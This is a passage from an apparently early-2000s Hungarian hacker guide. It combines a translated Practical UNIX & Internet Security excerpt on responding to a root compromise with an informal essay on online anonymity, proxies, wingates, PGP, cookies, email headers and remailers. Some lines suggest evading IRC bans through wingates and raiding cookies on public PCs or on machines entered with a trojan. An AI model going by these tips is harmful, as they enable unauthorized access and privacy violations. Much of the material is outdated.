Ez a user egy támadó - egy támadó,aki root lett!<br />
Szerencsére,a terminálodon van egy superuser shell. Úgy döntessz,hogy a legjobb<br />
megoldás,ha a rendszeredet azonnal leállítod. Ahhoz,hogy ezt megtedd, a következõ<br />
parancsokat kell begépelned :<br />
# sync<br />
# /etc/init 0<br />
Vagy esetleg az init processnek TERM szignált küldessz :<br />
# sync<br />
# kill -TERM 1<br />
Ez az eljárás nem ajánlott a System V rendszereken,ellenben szükséges a BSD<br />
rendszereken.<br />
A döntés, hogy megállítsd a rendszert ,azon a tényen alapult lövésed sincs<br />
arról,hogy ki volt a betolakodó,mit csinált - és hogy superuserré vált.Miután a<br />
betolakodó superuser, nem tudod,hogy a rendszer mely elemeit módosította - ha<br />
módosította.<br />
Például a támadó lehet,hogy eltávolított system programokat, vagy megsemmisített<br />
logfile-okat. Úgy találod,hogy a legjobb út,ha shutdownolod a rendszert,és egy védett<br />
terminálhoz mész ahol biztosan nem járhatott a támadó,amíg próbáltad kitalálni,mi is<br />
történik.<br />
A következõ lépés, hogy kinyomtatod az összes szükséges logot - amit csak lehet(pl<br />
: konzol logok,network logok) -majd megpróbálod kitalálni,mit is csinálhatott a<br />
jogosulatlan betolakodó. Nézd meg,hogy történt-e valami szokatlan a<br />
rendszeren,miután beloginolt a támadó. Ezek a logok infokat adhatnak ,hogy a<br />
156
Hackers’ Guide<br />
támadó milyen programokat futtatott,és milyen mûveleteket,parancsokat hajtott<br />
végre.<br />
A mai logokkal ne zárd le a vizsgálatot! Ha a támadó most rootként van belépve,<br />
lehet, hogy korábban már volt accountja a gépre. Ha a logjaid egy napokkal ezelõttre<br />
is visszanyúlnak, vizsgáld át azokat is.Ha ezek backupolva vannak szalagokra, hozd<br />
vissza õket, majd vizsgáld át.<br />
Ha egy betörés után nyomozol - talán törvényes erõkkel karöltve - mindig csinálj egy<br />
backupot az egész rendszerrõl! Így lesz bizonyítékod a feltört rendszerrõl.<br />
Ha erre nincs lehetõséged, akkor a logokat mentsd el. Csinálj egy írott naplózást<br />
mindenrõl, amit csinálsz, vagy akarsz csinálni, és minden ilyen bejegyzéshez írd oda<br />
az idõpontot is!<br />
A következõ lépés kitalálni, hogyan jöhetett be a támadó, és megbizonyosodni róla,<br />
hogy többé ezt nem tudja megtenni. Vizsgáld át az egész rendszert! Ellenõrizd<br />
minden file permissionjait, és mode-ját! Keress új SUID vagy SGID programok után!<br />
Nézz bele esetleges az /etc/passwd file-ba esetleges módosítások után! Ha csináltál<br />
ellenõrzési listákat a programkönyvtáraidról, futtasd le õket,hogy változtatásokat<br />
keress!<br />
Emlékezz, hogy a betörõ nem biztos,hogy külsõ ember volt.A legtöbb ilyen incidenst<br />
az intézmény valamelyik belsõ embere okozta valamelyik user jelenlegi<br />
elérésével,vagy a sajátjával.Ha olyat tapasztalsz,hogy az aktivítás egy legitim usertõl<br />
jön, az még nem feltétlenül jelenti azt, hogy valóban a user a tettes. Lehet, hogy<br />
valaki feltörte a jelszót, és kívülrõl jött be,de lehetett belsõ ember is, aki feltörte egy<br />
másik user jelszavát.<br />
Csak miután végrehajtottad ezeket a lépéseket,és leellenõrizted ezeket az<br />
információkat,csak azután hozhatod vissza a rendszert.<br />
Soha ne higgy semminek,kivéve a hardcopyt<br />
Ha a rendszeredet kompromittálták,ne higgy semmilyen online információnak. Ha<br />
gyanús változásokat találsz a file-okban, ne higgy semminek, amit a rendszered<br />
mond neked, mert egy jó system cracker bármit megváltoztathat a gépeden. Ez<br />
furcsának tûnhet, de jobb ha talán egy kis extra idõt töltünk a fileok<br />
visszaállításával,és a detektívesdivel, mintha az esemény mégegyszer<br />
lejátszódhatna a jövõben, és a támadó újra bejöhetne.<br />
Emlékezz, egy támadó, akinek sikerül szert tennie a superuseri jogokra, bármit<br />
megtehet a rendszereden, gyakorlatilag bármilyen byteot megváltoztathat a disken. A<br />
támadó bármilyen system programot át tud írni,le tud fordítani,ki tud cserélni<br />
másikra,így a standard eszközeid nem fogják elárulni jelenlétét. A támadó patchelheti<br />
a kernelt, amelyen a gépünk futtat, kikapcsolhatja a security opcióit amelyeket<br />
te elõzõleg bekapcsoltál. A támadó bármikor megnyithatja a raw disk device-okat<br />
olvasásra és írásra.Alapvetõen, a támadó aki megszerzi a superuseri<br />
jogosultságokat, a kedvére játszadozhat a rendszereddel - ha van elég ideje,<br />
motivációja és tudása. Gyakran nincs szükségük kiemelkedõ képességekre. Ehelyett<br />
különbözõ, publikusan elérhetõ eszközöket használnak a behatoláshoz.<br />
Például tegyük fel, hogy egy fileban módosítást vélsz felfedezni és kiadod az ls -l<br />
vagy ls -la parancsot. Az utolsó módosítás ideje, amit a parancs kiírt a fájlra, nem<br />
157
Hackers’ Guide<br />
biztos, hogy valódi. Legalább négy módszer van egy támadónak,hogy hogyan<br />
módosítsa az idõt,amelyet ez a parancs adott vissza. Ezek mindegyikét a jelenlegi<br />
rendszertámadások során is szokták alkalmazni :<br />
- A támadó írhat egy programot, amely megváltoztatja a file-módosítás idejét az<br />
utimes() rendszerhívást használva.<br />
- A támadó átírhatja a rendszeridõt és dátumot a date paranccsal. A támadó<br />
módosítja a file-okat,végül visszaállítja az idõt és dátumot. Ennek a technikának az<br />
az elõnye a támadó szemszögébõl, hogy az inode elérés, és a kreációs idõ is<br />
beállítódik.<br />
- A támadó írhat a raw disk-re, megváltoztatva bármilyen tárolt idõpont értékét.<br />
- A támadó átírhatja az ls parancsot, hogy ne mutassa meg a kérdéses file(ok) valós<br />
módosítási idõpontját.<br />
A superuseri jogot szerzett támadó egyetlen limitje, hogy semmi olyat nem tud<br />
megváltoztatni, ami ki van nyomtatva egy printeren,vagy hardcopy<br />
terminálra(hardcopy rulzz! :). Ezért jó, ha van egy naplózó facilityd, ami mindig<br />
logolja, amikor a rendszeridõ ill. dátum megváltozik, és a logot hardcopy terminálra,<br />
vagy egy másik gépre másolja.<br />
Ebbõl kiindulva ajánljuk, hogy legyen kéznél jelenlegi oprendszered bootolható<br />
floppyja, hogy amikor szükséges, be tudj bootolni a floppyról, és a rendszeredet nem<br />
módosított eszközökkel tudd átvizsgálni. Ezt párosítva egy adatbázis kivonattal a<br />
módosítatlan file-okról (olyan,mint amit például a Tripwire csinál), könnyen<br />
megtalálhatod azokat a file--okat,amelyek módosítva lettek.<br />
Eredeti mû : Practical UNIX & Internet Security<br />
Fordította : Th3NmY<br />
************************************************************************************************<br />
Betörések felfedezése és kezelése VI.<br />
A rendszer visszaállítása<br />
A következõ lépés a betörés kezelésében,hogy visszahozzuk a rendszert mûködõ<br />
állapotba.Az, hogy milyen gyorsan kell visszaállítanod a rendszert illetve hogy mit<br />
szándékozol tenni a betöréssel kapcsolatban, fogja eldönteni, hogy mikor, és hogyan<br />
csináld ezt a lépést.<br />
Íme néhány tipp, nagy vonalakban :<br />
158
Hackers’ Guide<br />
- Nyomozz addig, amíg ki nem derítetted, hogyan történhetett a betörés. Zárd le a<br />
sechole-okat, majd állítsd vissza a rendszert müxödõ állapotba.<br />
- Egyszerûen foltozd és javítsd ki azokat a dolgokat, amelyek kapcsolatba hozhatók<br />
a betöréssel. Ezután állítsd vissza a rendszert, de folyamatosan monitorozz mindent.<br />
- Csinálj egy gyors scan-t és tisztítást, majd állítsd vissza a rendszert.<br />
- Hívj törvényes végrehajtót, mielõtt bármit is csinálnál, és majd õk nyomozást<br />
indítanak.<br />
- Ne csinálj semmit.<br />
Ha úgy gondolod, kijavítassz minden rést,amely a támadót beengedhette és<br />
visszaállítassz minden sérült file-t a rendszeren,nem árt ,ha vannak jó backupjaid a<br />
rendszerrõl,így egyszerûbben visszahozható a mûködési állapot.<br />
Néha elég nehéz feladat kideríteni, hogy hogyan tudott bejutni a támadó, mert a<br />
logok álltalában nem tartalmaznak elég információt arról,hogy egész pontosan mi is<br />
történhetett. Sok eszköz létezik arra az esetre is, ha esetleg reverse-engineering -et<br />
akarunk csinálni. A legtöbb behatolás egy már kompromittált user password, vagy<br />
egy bug eredményei. Ha ebben az esetben ez egy bug volt, nehéz kideríteni mi is<br />
volt az postosan, pláne ha ez egy új bug volt,ami még nem volt széles körben<br />
exploitolva. Ha system software exploit gyanú áll fenn, megpróbálhatsz kapcsolatba<br />
lépni a gyártóval, hátha tudnak segíteni. A legtöbb esetben ez segít, ha karbantartási<br />
szerzõdésed van, vagy fõvásárló vagy.<br />
Végsõ esetben megpróbálhatsz az Useneten a security groupokban,illetve a jelenlegi<br />
WWW site -okon vagy levelezõlistákon szétnézni. Gyakran lehet itt találni a<br />
különbözõ rendszerek sebezhetõségérõl információkat.<br />
Eredeti mû : Practical UNIX & Internet Security<br />
Fordította : Th3NmY<br />
************************************************************************************************<br />
Névtelenség<br />
- ...avagy "Mindenki minket figyel!" -<br />
Anonimitás<br />
Sokan azt hiszik, hogy az interneten teljes névtelenség és szabadság van... Pedig ez<br />
koránt sincs így... A másik, hogy az ember nem mondhat semmit meggondolatlanul,<br />
159
Hackers’ Guide<br />
mert a nagy testvér pillanatok alatt a .log fájlokból lenyomoz minket, aztán lehet<br />
magyarázni neki a dolgot :))) Szóval megpróbálom a saját szemszögemből leírni az<br />
egészet, amit tudok, amire érdemes odafigyelni... Főleg azért, hogy az embert ne<br />
nyomják el teljesen és hogy személyisége kellő képpen kibontakozhasson az<br />
interneten... Amennyiben bővebb információra lenne szükséged vagy valamit nem<br />
értesz, ötleted vagy tanácsod van, kérlek oszd meg velem azt e-mail formájában,<br />
illetve ha ráérsz, akkor látogass el a Hackers' Faq és a FCF és a Dodge Viper<br />
Hacker Club oldalára.<br />
Egyáltalán beszélhetünk-e névtelenségről az interneten?<br />
Sokan abban a tévhitben élnek, hogy abszolút-e névtelenek az interneten és<br />
szinte mindent megtehetnek, amit a valós világban nem... Úgy érzik, hogy teljes<br />
szabadság van a vírtuális valóságban... pedig :). Manapság számomra kicsit<br />
úgytűnik a dolog, hogy az anarchizmus legkisebb jelei sem mutatkoznak a<br />
neten, kivéve pár kivételtől... Most néhány példával szeretnem elvenni azok<br />
kedvét, akik még a függetlenség, szabadság és az abszolút anarchia<br />
ábrándjaiban élnek:<br />
1.) Vegyük elősször is elrettentő példáknak a honlapokat... Amiket ugyebár a<br />
világhálóra kötött webszerverekről töltünk le. Ez az egész úgy megy, hogy a géped a<br />
böngészőprogramodon keresztül letölti a webszerverről a fájlokat... ez a webszerver<br />
viszont van olyan kedves, és egy rakás információt meghatározott .log kiterjesztésű<br />
fájlokba elment... hátha jó lesz még valamikor :) A .log fájlok segítségével a<br />
webszerver üzemeltetője rengeteg információhoz jut veled kapcsolatban... És mint<br />
azt tudjuk, ha megvan a te valódi IP-t, akkor bizony megfogtak ;) például, (de csak a<br />
rend kedvéért) az alábbi infót szerzhetik meg :<br />
- IP címed<br />
- HOST neved<br />
- Melyik kontinensről, melyik országból illetve városból kapcsolódsz rá a világhálóra<br />
- Webböngésző programod nevét és típusát<br />
- Operációs rendszered típusát<br />
- Monitorod felbontását és színmélységét<br />
- Az előző URL címet, ahol éppen browsereddel jártál<br />
- Internet szolgáltatód nevét<br />
És persze ez csak néhány "kedvcsináló" a sok ezerből... Ezeket az adatokat persze<br />
a webszervernek önmagában nem dolga eltárolni, de különböző scriptek<br />
segítségével a kliensről a kapcsolat közben lekérdezheti és általában kérdezi :(<br />
2.) Folytassuk a sort az IRC-el... Ugye te is szoktál IRC-elni? Neked is van kedvenc<br />
csatornád? Tehát tételezzük fel, hogy éppen ebben a pillanatban fent vagy az egyik<br />
csatornán és esetleg vársz valakire. Valakivel elkezdesz beszélgetni és az illetőnek<br />
több infóra lenne szüksége veled kapcsolatban... Nem kell semmit tennie... Elég<br />
beírni a Státuszba, hogy "/whois TeBeceneved" és máris egy rakás infóhoz jut veled<br />
kapcsolatban... Itt van néhány:<br />
160
- Megtudhatja a valódi nevedet<br />
- E-mail címedet<br />
- IP címedet<br />
- HOST nevedet<br />
- Internetszolgáltatód nevét<br />
- Kontinens, ország, város nevét, ahonnan te IRC-elszg<br />
..stb. stb.<br />
Hackers’ Guide<br />
Emellett persze ott vannak az online játékok, amelyek mellett néha lehet IRC-elni<br />
web alapon... Ott is pillanatok alatt rájöhetnek az IP címedre aztán kiegyenlítik a<br />
hátrányukat ;) Persze a fairplay a legfontosabb :)))<br />
3.) Tételezzük fel, hogy az én nevem Kisbuci Illés és az e-mail címem<br />
kisbucii@mail.ISP.hu. Ez az egyik legáltalánosabb... vagyis, hogy a helyi<br />
internetszolgáltatók (ISP - Internet Service Provider) a felhasználónév választásnál a<br />
leendő ügyfeleknek azt ajánlják, hogy a teljes veztéknevükből és a keresztnevük első<br />
betűjéből álló felhasználónevet válasszák természetesen ékezet nélkül... A cégeknél<br />
is hasonló a választás, ha éppen az egyik ISP-nél fizetnek elő internet illetve e-mail<br />
szolgáltatásra... Vegyük példának az Elender feltört oldalán található jelszavakat és<br />
felhasználóneveket... A cégek általában teljes nevüket adják meg felhasználónévnek<br />
illetve a névhez még hozzátoldják a vállalati formát (pl. kempfkft@mail.isp.hu,<br />
epker@mail.isp.hu, komqa-bt@mail.isp.hu stb.) Persze ez nem örökérvényű<br />
kijelentés... vannak eltérő esetek is... amikor magánszemély az internetes nickjét<br />
választja azonosítónak... Ez persze főleg a fiatalabb korosztálynál jellemző... Sok<br />
internetszolgáltató hozzáférést biztosít könyvtáraihoz. Ahhoz, hogy valakiről<br />
megtudjunk információkat illetve, hogy beazonosíthassuk e-mail címét, nem kell<br />
többet tenni, mint ellátogatni böngészőprogramunkal a http://www.whowhere.com<br />
URL cím alá... Itt be kell pötyögni az illető vezeték illetve/vagy keresztnevét és<br />
lehetséges mail szerverének domainjét... És láss csodát... Megvan a keresett<br />
személy... Ha nem szeretnéd, hogy ilyen módon szerezzenek rólad tudomást,<br />
ajánlatos ellátogatni az oldalra és ott felvenni a kapcsolatot a whowhere.com<br />
munkatársaival...<br />
4.) Finger daemonokról csak úgy :)... Gondolom nem sokat hallottál róla? Nem<br />
kötötték az orrodra, amikor előfizettél az ISP-nél? :) Jó, mondjuk Magyarországon<br />
nagyon nem is kell, hogy az orrodra kössék, ugyanis tudomásom szerint csak egy<br />
szolgáltató futtat finger daemont... ha jól emlészem az Interware, és ott is csak annyit<br />
tudhatsz meg, hogy éppen milyen azonosítók vannak fent a neten... De külföldön<br />
egyes ISP-knél sokkal többet is... Ezek a daemonok olyan speciális programok,<br />
amelyek egy különleges, elkülönített porton/portokon várják a beérkező<br />
kapcsolatokat... A finger daemon a 79-es porton található meg... Tételezzük fel, hogy<br />
a fentebb említett Kisbuci Illés e-mail címe: kisbucii@mail.isp.hu ... Kisbuciról csak<br />
ennyit tudunk... Tehát az azonosítóját és internetszolgáltatójának nevét/domainjét...<br />
Tehát látogassunk el az internetszolgáltatóhoz a 79-es porton... Remélhetőleg van<br />
finger daemonjuk... Gépeljük be most, hogy kisbucii és láss csodát :)... Persze<br />
mégegyszer szeretném hangsúlyozni, hogy magyarországon csak egy szolgáltatónál<br />
van ilyen... Külfödön is elég ritkák... de azért előfordulnak... Egyes esetekben a finger<br />
daemonok az alábbi információval szolgálnak ügyfeleikről:<br />
- Az azonosító mögé bújt személy valódi nevéről<br />
- Mikor voltak az azonosítóval fent utoljára<br />
161
Hackers’ Guide<br />
- Ha az azonosítóval éppen fent vannak a neten, akkor ez mióta van...<br />
- Vajon van-e az illetőnek levele avagy sem...<br />
Persze ez ISP-k szerint változó... Van amelyek még a felhasználó lakcímét,<br />
telefonszámát stb. is kitálalják... Ezeket az információkat célszerű dolgokra is tudod<br />
használni...Ugye a legtöbb Instant Messanger (ICQ, AIM, YIM, MSIM) program<br />
megengedi, hogy bizonyos azonosító alatt lévő személyeket a tudtuk nélkül<br />
hozzáadhass a te "Kapcsolat listád"-hoz... Tehát megtudhatod, hogy az illető mikor<br />
online illetve offline, feltéve persze, hogy az illető mindíg futtatja Instant Messanger<br />
programját, amikor fent van a neten... Ha ismered az e-mail címét és ISP szerverén<br />
fut finger daemon, akkor megtudhatod, hogy valóban offline vagy csak nem indította<br />
el az Instant Messanger programját...<br />
IRC-nél még ajánlatos kiadni a státusz sorba a /mode TENICKED +x parancssort...<br />
Ennek segítségével ha valaki /whois TENICKED illetve /dns TENICKED parancsot<br />
bepötyögi, akkor nem tudja majd az IP/Host-odat megtudni... Persze nem minden<br />
IRC hálózatnál működik... És természetesen ha veled külön létesít DCC Chatet,<br />
akkor MS-DOS Parancssorba bepötyögött "Netstat" parancsal ki fogja azért nagy<br />
nehezen találni, hogy mi is az IP-d, Hostod...<br />
Mi az a Proxy?<br />
Elősször is szeretném leszögezni, hogy még én is csak kezdő stádiumban vagyok és<br />
nagyképűség lenne azt mondani, hogy hacker lennék... mint azt teszik néhányan<br />
csak azért, mert a kezdők valami alap kérdést kérdeznek... és ők egyből hülyének<br />
nézik őket vagy lelámázzal, bár lehet, hogy csak azért teszik ezt, mert ők sem<br />
tudják... :) Naszóval maradjuk a témánál... Éppen múltkor beszélgettem valakivel<br />
IRC-en... egy underground csatornán találkozott velem, szüksége lett volna<br />
segítségre és én mint mindig a kis tudásommal megpróbáltam segíteni... Ő kérdezte<br />
meg a társalgás közben, hogy mi is az a Proxy? Lehet, hogy egyesek tudják, de van<br />
aki még hallani sem hallott róla nagyon... Szóval a proxy szervereket elsődlegesen is<br />
azért találták ki, hogy a felhasználók internet sebességét az ISP szervere és a<br />
felhasználó gépe között felgyorsítsák... Amikor te a böngésződben szörfözöl és<br />
szeretnél megtekinteni ugye egy honlapod... elősször is bepötyögöd az oldal URL-jét<br />
a címsorba és nyomsz egy hatalmas entert... naszóval a te HTTP kérelmed nem az<br />
URL alatt lévő szerverre érkezik meg, hanem a te ISP-d proxy szerverére, ami<br />
nagyvalószínűséggel az internetszolgáltató központjában van (általában Budapest) A<br />
HTTP kérelmet a proxy szerver megvizsgálja (proxy server pl. Microsoft Proxy Server<br />
2.0, Squid/Linux)... vagyis, hogy megtekintette-e valaki az utóbbi időben a bizonyos<br />
oldalt... ha van egy másolat a szerveren az oldalról, akkor leellenőrzi a szerver, hogy<br />
a mérete és a fájl megegyezik-e vagy le kell-e tölteni... Ha megegyezik, akkor máris<br />
küldi a gépedre, ha nem, akkor elősször letölti a proxy szerverre az oldalt és onnan a<br />
te gépedre továbbítja... Ezáltal ugyebár névtelenséget biztosítanak neked a proxyk...<br />
vagyis a webszerverhez nem te juttatod el a kérelmet a letöltéssel kapcsolatban,<br />
hanem a szerver... és a proxy szerver IP-jét illetve adatait fogják látni és nem a<br />
tiedet... Persze nem akarom elvenni a kedvet, de ha nagy disznóságot csinálsz,<br />
akkor a proxy szerveren keresik vissza az infót :))) a .log fájlokból... A legtöbb hazai<br />
internetszolgáltatónak van proxy szervere, sőt ajánlják is. Ha ezzel kapcsolatban<br />
bővebb információra lenne szükséged, akkor kérdezd meg az internetszolgáltatód<br />
162
Hackers’ Guide<br />
supportját :), ahogy azt a WBT csapat is tette :))) Persze a proxykkal kapcsolatban<br />
fenntartások is felmerülhetnek egyes ISP-knél...<br />
- Legtöbb internetszolgáltató proxy szervere nem működik egyenletesen, azaz<br />
nincsenek normálisan confizva.<br />
- A weboldalak üzemeltetői a proxy alapján megtudják nézni, hogy melyik<br />
internetszolgáltató felhasználója voltál és az ISP-n keresztül ugyancsak visszatudnak<br />
utánad nyomozni. Persze vannak publikus proxy szerverek is... Ha ilyenek<br />
érdekelnek, akkor tekintsd meg http://www.cyberarmy.com/list URL alatt található<br />
publikus proxyszerverek listáját...<br />
Mi az a wingate szerver?<br />
Wingate-ek segítségével névtelen tudsz maradni az interneten. Ha találsz egy<br />
wingate szervert amire fel tudsz kapcsolódni, akkor azon keresztül tudsz másokkal<br />
kommunikálni az interneten keresztül pl. amikor IRC-lesz valakivel... Nem a te IP<br />
számodat, HOST nevedet fogják látni, hanem a wingate szerverét... azt meg<br />
nyugodtan pingelhetik :) Tehát a névtelenség mellett egy bizonyos biztonságot is<br />
nyújt neked... A wingate-ek egyik rendkívüli tulajdonságuk, hogy nagyon<br />
egyszerűek... Hogy értem ezt? Úgy hogy szinte minden géphez (még a tiedhez is)<br />
egyszerűen lehet kapcsolódni az 1080-as porton keresztül... miután kapcsolódtunk,<br />
be kell gépelni a cél-ip-címet_vagy_host-nevet (nem találomra ;)) ezek után a szerver<br />
visszaigazol... Természetesen a szerver rendszergazdája megtudja változtatni<br />
szükség esetén a wingate portot... A wingatet akkor is tudod hasznosítani ha<br />
hostodat banoltak mondjuk "nick flood" miatt a csatornáról és nem engednek fel...<br />
Akkor irány egy wingate szerver... és azon keresztül a kedvenc csati :) Persze itt<br />
szeretném felhívni a figyelmet arra is, hogy néhány IRC hálózat olyan botokat<br />
használ, ami kidobja a wingate-en keresztül csatlakozó felhasználókat... Tehát a bot<br />
megnézi, hogy a nick milyen host alatt kapcsolódott, majd megpróbál erre a hostra<br />
az 1080-as porton keresztül kapcsolódni... és ha ez sikerül neki akkor sajnos ugy<br />
repülsz az IRC hálóról, mint a Concorde repülők... Van ez így ;)<br />
Kriptográfia? Titkosítás?<br />
Mindenki valamilyen módon (legyen az egyszerű /a'la Hotmail/ vagy nehéz) eltudja<br />
valamilyen módon olvasni személyes leveleidet... Nyugodtan nem társologhatsz emailben<br />
vagy telefonon keresztül, de még IRC hálózaton illetve Instant Messangeren<br />
keresztül sem, amikor tudod, hogy a nagy testvér figyel téged... Ezért találták ki<br />
valamikor a '90-es évek elején Philip Zimmerman és társai a PGP titkosítási<br />
rendszert... Amely mára a legelterjedtebb és legismertebb "strong cryptosystem"-é<br />
vált... Elméletileg a PGP rendszert nem lehet külföldre exportálni... ezt a PGP<br />
munkatársai úgy oldották meg, hogy kinyomtatták könyv formájában a forrást és így<br />
vitték ki az USA területén kívülre... Persze ez ellen a különböző hivatalok (NSA, CIA,<br />
FBI) véresen tiltakoztak... A PGP kriptórendszer legfőbb tulajdonságai:<br />
- Az USA besorolása szerint "strong cryptosystem", azaz erős kriptográfiai<br />
rendszerek<br />
- Kulcsok segítségével történik a titkosított kommunikáció az elektronikus<br />
levelezésben<br />
163
Hackers’ Guide<br />
- Digitális aláírás készítésére alkalmas<br />
- Freeware, azaz szabadon terjeszthető... Forrása bárki számára hozzáférhető...<br />
- Lemezünk felületét tökéletesen visszaállíthatatlanul törölhetjük a PGP rendszer<br />
segítségével<br />
- Merevlemezünkön kijelölt helyen a PGP létrehoz egy PGP Disk-et, ahol minden fájl<br />
titkosítva van...<br />
A PGP-vel titkosított fájlok (főleg megfelelő kód és hosszúság esetén) csak egyes<br />
titkosszolgálatok gigantikus szuperszámítógépei tudják feltörni... és azok is csak<br />
hosszú idő után... Ajánlatos továbbá, hogyha rávetemedsz a PGP-re, akkor a<br />
kulcsod generálásánál ügyelj a következőkre:<br />
- Kulcsod hosszúsága lehetőleg 4096bites legyen<br />
- Kódod hosszúsága 20-30 karakter között legyen... és felváltva legyenek benne A-Zig,<br />
0-9-ig karakterek, illetve egyéb (#,&,@,{,},;,$,ß,÷,×,¤ stb.) karakterek, hogy minél<br />
nehezebb legyen megtörni a titkosított dokumentumot... lehetőleg csak a tartalom<br />
elévülése után :)))<br />
Cookiek<br />
Tudni akarod, hogy a weboldalak honnan szereznek veled kapcsolatban<br />
információkat, hogyan emlékeznek a becenevedre? Honnan tudják a kódodat, e-mail<br />
címedet, azt, hogy pl. egy webáruházban mit raktál be a kosárba legutoljára illetve,<br />
hogy mit vásároltál? Minderre és még számtalan kérdésre a válasz egy szó:<br />
cookiek... azaz magyarra fordítva sütik... Szóval ezek a cookiek kis fájlok, amelyek a<br />
te gépeden találhatóak, és a weboldalak a te merevlemezedről hívják meg ezeket...<br />
Ezekben rengeteg információ van veled kapcsolatban... Ezek a sütik minden<br />
op.rendszerben máshol helyezkednek el...<br />
- Windows'9x op.rendszerek esetén a "\Windows\cookies" könyvtárban...<br />
- Unix op.rendszerek esetén viszont a "/home/your-login", "/usr/your-login" vagy<br />
"/usr/local/your-login" könyvtárakban...<br />
Néhány ötlet és ajánlás a cookiekkal kapcsolatban:<br />
- Ajálatos a böngésződet úgy beállítani, hogy minden alkalommal kérdezzen rá a<br />
cookiek elfogadására...<br />
- Ha te egy nyilvános PC-ről internetezel (pl. Cyberkávézók) figyelj oda, hogy<br />
egyetlen egy cookie se maradjon a gépen, illetve ha előtted ültek, akkor nézz körül...<br />
Hátha valamelyik balfék fent hagyott néhányat ;)))<br />
- Ha sikerül trojai programmal bejutnod egy gépre, akkor ajánlatos szétnézned a<br />
cookiek körül... hátha találsz valami számodra is inycsiklandozót... :) Egyébként a<br />
cookiek az alábbi képpen épülnek fel:<br />
- NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure<br />
VALUE - a cookie neve<br />
DATE - a cookie ekkor jár le<br />
PATH és DOMAIN_NAME - melyik URL férhet hozzá a cookiehoz<br />
secure - a cookie-t biztonságos csatornában<br />
kell küldeni<br />
164
Hackers’ Guide<br />
History, bookmark, Cache<br />
Benyomok még néhány fogalmat, mint a tankönyvekben, hogy abszolút-e érthetetlen<br />
legyen az egész :).<br />
History - Megőrzi (alap esetben 30 napig) azokat az URL-eket, amelyeken jártunk. .<br />
Bookmark - A bookmark a gyakran látogatott oldalak URL-jét őrzi meg. Ha olyan<br />
oldalhoz tettünk bookmark-ot (Ctrl+D) amely login nevet és jelszót igényel, akkor a<br />
cache tartalmát vizsgálva minimum a felhasználónév megvan.<br />
Cache - A cache a böngészés felgyorsítására szolgál. Amikor letöltünk egy oldalt,<br />
akkor a böngésző az egész oldalt a hozzátartozó képekkel együtt tárolja a cache-ben<br />
(Windows operációs rendszer esetén a C:\Windows\Temporary Internet Files<br />
könyvtárban vannak ezek a fájok). Ha ugyanazt az oldalt kívánjuk újra megnézni,<br />
akkor a böngésző az oldalt a cache-ből veszi elő, nem pedig a távoli szerverről. Ha a<br />
reload gombra kattintunk (vagy F5 gomb), akkor a böngésző megnézi, hogy a távoli<br />
szerveren lévő példány frissebb-e, mint a helyi gépen tárolt, és a legutolsó változatot<br />
tölti le, olyan, mint egy házi proxy. A legtöbb böngésző a form-okba írt adatokat is<br />
eltárolja.<br />
E-mail és Anonymus remailerek?<br />
Szóval egy újabb pont, rész vagy akárminek is hívjuk, aminek segítségével<br />
információt szerezhetnek rólunk... Ha küldesz valakinek egy e-mail, akkor egy csomó<br />
infót eltárol rólad a levél... Íme egy levél "hátsó" tartalma, amit éppen egy levéllistára<br />
küldtek és így érkezett meg hozzám:<br />
Return-Path: <br />
Delivered-To: nestan@freemail.hu<br />
Received: (qmail 99176 invoked from network); 3 Aug 2000 18:33:50 +0200<br />
Received: from ho.egroups.com (208.50.99.200)<br />
by fm7.freemail.hu with SMTP; 3 Aug 2000 18:33:45 +0200<br />
X-eGroups-Return: sentto-1857759-326-965320298nestan=freemail.hu@returns.onelist.com<br />
Received: from [10.1.10.36] by ho.egroups.com with NNFMP; 03 Aug 2000 16:31:47<br />
-0000<br />
Received: (qmail 7265 invoked from network); 3 Aug 2000 16:31:35 -0000<br />
Received: from unknown (10.1.10.26) by m2.onelist.org with QMQP; 3 Aug 2000<br />
16:31:35<br />
-0000<br />
Received: from unknown (HELO fm3.freemail.hu) (194.38.105.13) by mta1 with<br />
SMTP; 3<br />
Aug 2000 16:31:25 -0000<br />
Received: (qmail 78246 invoked by uid 425920); 3 Aug 2000 18:31:20 +0200<br />
To: foldalatti@egroups.com<br />
Message-ID: <br />
X-Originating-IP: [212.40.96.15]<br />
From: Cagliostro <br />
MIME-Version: 1.0<br />
165
Hackers’ Guide<br />
Mailing-List: list foldalatti@egroups.com; contact foldalatti-owner@egroups.com<br />
Delivered-To: mailing list foldalatti@egroups.com<br />
Precedence: bulk<br />
List-Unsubscribe: <br />
Date: Thu, 3 Aug 2000 18:31:19 +0200 (CEST)<br />
Reply-To: foldalatti@egroups.com<br />
Subject: [foldalatti] All in 1 Maker for All<br />
Content-Type: multipart/mixed;<br />
boundary="0-1804289383-965320279=:78235"<br />
Ugye hogy mennyi információt rejt egy egyszerű levél az IP-től kezdve a<br />
levelezőprogram típusáig... Tehát nem elég, hogy egy ingyenes e-mail szolgáltatónál<br />
regisztrálunk magunknak postafiókot, még mást is kell tennünk, hogy az anonimitást<br />
tényleg élvezhessük... Ehhez jók az Anonymous remailerek... Ezeknek a listáját<br />
megtalálod a http://www.theargon.com URL cím alatt. Most röviden azért<br />
elmagyarázom, hogy mikép tudod használni ezeket... persze csak a rend kedvéért...<br />
Tehát elősször is menj el a http://anon.ISP.ee -re és regisztrálj be magadnak egy<br />
ingyenes azonosítót... Ha te regisztráltad magad, akkor küldj egy e-mailt a<br />
robot@anon.isp.ee -re az alábbi tartalommal:<br />
user: felhasznalo-neved<br />
pass: te-jelszavad<br />
realaddr: a-te-valodi-email-cimed<br />
realsubj: a-kuldendo-leveled-temaja<br />
És ide kerül a levél tartalma... yó mi?!<br />
Szóval itt egy példa, így kell:<br />
user: nestan<br />
pass: jolennehatudnad<br />
realaddr: i_am@thegod.com<br />
realsubj: Éljen a névtelenség mindörökké!<br />
Üdv kedves barátom!!<br />
Ez egy névtelen e-mail üzenet.<br />
Legjobb kívánsággal: I'am the God<br />
Egy kis idő után fogsz egy visszaigazoló e-mail kapni az anon.isp.ee-től, hogy<br />
leveled megérkezett... Ha ezt a levelet visszaküldöd, akkor a rendszer elküldi a<br />
kijelölt e-mail címre a levelet...<br />
Vannak persze olyan anonymous remailerek, amelyek webes felületen is<br />
elérhetőek... pl. az alábbi URL alatt: http://www.replay.com/remailer/anon.html<br />
A másik az e-mail relaying... Szóval a rosszul bekonfigurált mailserverek megengedik<br />
(a'la sulinet) ezt... Például a nestan@freemail.hu@sulineve.sulinet.hu e-mail címre<br />
